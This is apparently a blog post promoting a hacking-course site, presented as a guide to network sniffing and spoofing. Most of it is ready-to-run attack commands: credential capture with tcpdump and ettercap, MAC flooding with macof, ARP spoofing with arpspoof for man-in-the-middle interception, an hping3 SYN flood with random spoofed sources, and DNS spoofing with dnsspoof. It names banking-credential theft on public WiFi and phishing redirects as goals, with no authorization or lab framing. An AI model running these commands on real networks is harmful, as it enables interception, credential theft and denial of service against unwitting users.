Back to BlogsNetwork Security

Sniffing & Spoofing Attacks — Complete Technical Guide

Anuj Singh (Admin) 31 March 2026 610 views

Sniffing & Spoofing — Network Attack Fundamentals

These are the foundation of all network attacks. Every hacker must understand how data flows and how to intercept it.

Passive Sniffing

On a hub network or with monitor mode, you can capture ALL traffic without any active attack.

# Capture all HTTP traffic
tcpdump -i eth0 -A 'port 80'

# Capture with Wireshark
wireshark -i eth0 -k

# Capture credentials
ettercap -T -i eth0

Active Sniffing (Switched Networks)

Modern networks use switches that send traffic only to the intended port. Active attacks are needed:

MAC Flooding

macof -i eth0
# Floods switch's CAM table → switch becomes a hub

ARP Spoofing

# Become the man in the middle
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t victim router
arpspoof -i eth0 -t router victim

Spoofing Attacks

IP Spoofing

# Send packets with fake source IP
hping3 -S --flood -V -p 80 --rand-source target

DNS Spoofing

# Redirect dns queries to fake server
dnsspoof -i eth0 -f hosts.txt

Real Impact

  • 🔴 Steal banking credentials on public WiFi
  • 🔴 Redirect users to phishing sites
  • 🔴 Intercept VoIP calls
  • 🔴 Modify data in transit

🔥 Master network attacks at ONLY4YOU →

Want to Learn This Practically?

Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!

Sign Up & SubscribeRead More Blogs

Continue Learning

← All ArticlesBrowse CoursesAbout ONLY4YOU